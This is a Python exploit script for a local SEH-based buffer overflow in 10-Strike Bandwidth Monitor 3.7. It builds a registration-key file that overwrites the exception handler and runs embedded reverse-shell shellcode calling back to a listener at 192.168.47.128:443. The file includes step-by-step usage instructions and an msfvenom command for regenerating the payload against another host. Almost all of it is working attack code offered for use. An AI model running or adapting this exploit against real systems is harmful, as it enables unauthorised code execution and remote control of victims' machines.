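#!/usr/bin/python
# Title: 10-Strike Bandwidth Monitor 3.7 - Local Buffer Overflow SEH
# Date: 2018-07-24
# Exploit Author: absolomb
# Vendor Homepage: https://www.10-strike.com/products.shtml
# Software Link: https://www.10-strike.com/bandwidth-monitor/download.shtml
#
# Usage: run the script, open the generated sploit.txt and copy its contents to
# the clipboard. Open Bandwidth Monitor, choose "Enter my key" (or Help ->
# Registration), paste the code and hit OK -> shell.
#
# Reviewer notes:
# - SHELLCODE below is a pre-generated windows/shell_reverse_tcp that calls back
#   to 192.168.47.128:443 (the author's lab listener). Regenerate it for your own
#   listener before use, keeping the same bad-character list:
#     msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> \
#       -b '\x00\x0a\x0d' -f python -v shellcode
#   The payload travels through a text field via the clipboard, so NUL, LF and
#   CR would truncate or mangle it; build_payload() refuses a payload that
#   contains any of them instead of silently writing a broken file.
# - The SEH handler 0x01174647 (POP POP RET) is an address inside
#   BandMonitor.exe per the author; it is specific to the 3.7 build and has no
#   bad characters in its little-endian form (\x47\x46\x17\x01).
# - The file is now written in binary mode so the payload bytes are emitted
#   exactly as built, with no platform newline translation.

# Name of the generated file the user pastes from.
OUTPUT_FILE = "sploit.txt"

# Bytes the target's text input path cannot carry (matches the msfvenom -b list).
BAD_CHARS = b"\x00\x0a\x0d"

# Number of filler bytes from the start of the input to the SEH record (nSEH).
NSEH_OFFSET = 4188

# Bytes reserved after the SEH record; the shellcode is padded with filler up
# to this size so the total payload length stays constant (6000 bytes).
TRAILER_SIZE = 1804

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.47.128 LPORT=443
#          -b '\x00\x0a\x0d' -f python -v shellcode   (351 bytes)
SHELLCODE = (
    b"\xbb\x03\xe2\x9b\xb7\xda\xc3\xd9\x74\x24\xf4\x5e"
    b"\x29\xc9\xb1\x52\x31\x5e\x12\x83\xc6\x04\x03\x5d"
    b"\xec\x79\x42\x9d\x18\xff\xad\x5d\xd9\x60\x27\xb8"
    b"\xe8\xa0\x53\xc9\x5b\x11\x17\x9f\x57\xda\x75\x0b"
    b"\xe3\xae\x51\x3c\x44\x04\x84\x73\x55\x35\xf4\x12"
    b"\xd5\x44\x29\xf4\xe4\x86\x3c\xf5\x21\xfa\xcd\xa7"
    b"\xfa\x70\x63\x57\x8e\xcd\xb8\xdc\xdc\xc0\xb8\x01"
    b"\x94\xe3\xe9\x94\xae\xbd\x29\x17\x62\xb6\x63\x0f"
    b"\x67\xf3\x3a\xa4\x53\x8f\xbc\x6c\xaa\x70\x12\x51"
    b"\x02\x83\x6a\x96\xa5\x7c\x19\xee\xd5\x01\x1a\x35"
    b"\xa7\xdd\xaf\xad\x0f\x95\x08\x09\xb1\x7a\xce\xda"
    b"\xbd\x37\x84\x84\xa1\xc6\x49\xbf\xde\x43\x6c\x6f"
    b"\x57\x17\x4b\xab\x33\xc3\xf2\xea\x99\xa2\x0b\xec"
    b"\x41\x1a\xae\x67\x6f\x4f\xc3\x2a\xf8\xbc\xee\xd4"
    b"\xf8\xaa\x79\xa7\xca\x75\xd2\x2f\x67\xfd\xfc\xa8"
    b"\x88\xd4\xb9\x26\x77\xd7\xb9\x6f\xbc\x83\xe9\x07"
    b"\x15\xac\x61\xd7\x9a\x79\x25\x87\x34\xd2\x86\x77"
    b"\xf5\x82\x6e\x9d\xfa\xfd\x8f\x9e\xd0\x95\x3a\x65"
    b"\xb3\x59\x12\x4a\xc3\x32\x61\x94\xc2\x79\xec\x72"
    b"\xae\x6d\xb9\x2d\x47\x17\xe0\xa5\xf6\xd8\x3e\xc0"
    b"\x39\x52\xcd\x35\xf7\x93\xb8\x25\x60\x54\xf7\x17"
    b"\x27\x6b\x2d\x3f\xab\xfe\xaa\xbf\xa2\xe2\x64\xe8"
    b"\xe3\xd5\x7c\x7c\x1e\x4f\xd7\x62\xe3\x09\x10\x26"
    b"\x38\xea\x9f\xa7\xcd\x56\x84\xb7\x0b\x56\x80\xe3"
    b"\xc3\x01\x5e\x5d\xa2\xfb\x10\x37\x7c\x57\xfb\xdf"
    b"\xf9\x9b\x3c\x99\x05\xf6\xca\x45\xb7\xaf\x8a\x7a"
    b"\x78\x38\x1b\x03\x64\xd8\xe4\xde\x2c\xe8\xae\x42"
    b"\x04\x61\x77\x17\x14\xec\x88\xc2\x5b\x09\x0b\xe6"
    b"\x23\xee\x13\x83\x26\xaa\x93\x78\x5b\xa3\x71\x7e"
    b"\xc8\xc4\x53"
)

# nSEH: "JMP always true" -- a pair of short conditional jumps (0x71 = JNO +6,
# 0x70 = JO +4); whichever way OF is set, one of them is taken and both land
# 8 bytes past nSEH, i.e. on the first shellcode byte. No bad chars.
NSEH = b"\x71\x06\x70\x04"

# SEH: 0x01174647 POP POP RET in BandMonitor.exe, little-endian.
SEH = b"\x47\x46\x17\x01"

# Filler byte used before nSEH and after the shellcode.
FILLER = b"\x41"


def build_payload(shellcode=SHELLCODE):
    """Return the registration-key bytes that overwrite the SEH record.

    Layout: NSEH_OFFSET filler bytes, NSEH, SEH, the shellcode, then filler to
    pad the trailer to TRAILER_SIZE bytes (total 6000 bytes for any shellcode
    that fits).

    Args:
        shellcode: raw bytes to place after the SEH record; must be no larger
            than TRAILER_SIZE and must avoid BAD_CHARS.

    Raises:
        ValueError: if the shellcode does not fit in the trailer or the
            finished payload contains a byte from BAD_CHARS -- either would
            produce a file that silently fails when pasted into the app.
    """
    if len(shellcode) > TRAILER_SIZE:
        raise ValueError(
            "shellcode is %d bytes, trailer only holds %d"
            % (len(shellcode), TRAILER_SIZE)
        )
    payload = (
        FILLER * NSEH_OFFSET
        + NSEH
        + SEH
        + shellcode
        + FILLER * (TRAILER_SIZE - len(shellcode))
    )
    # Slice (not index) so the check behaves the same on Python 2 and 3.
    for i in range(len(BAD_CHARS)):
        bad = BAD_CHARS[i:i + 1]
        if bad in payload:
            raise ValueError(
                "payload contains bad char 0x%02x at offset %d"
                % (ord(bad), payload.index(bad))
            )
    return payload


def main():
    """Build the payload and write it to OUTPUT_FILE in binary mode."""
    payload = build_payload()
    # "wb": emit the bytes exactly as built, no newline translation on Windows.
    with open(OUTPUT_FILE, "wb") as out:
        out.write(payload)
    print("Size: %d bytes" % len(payload))
    print("TXT file created!")


if __name__ == "__main__":
    main()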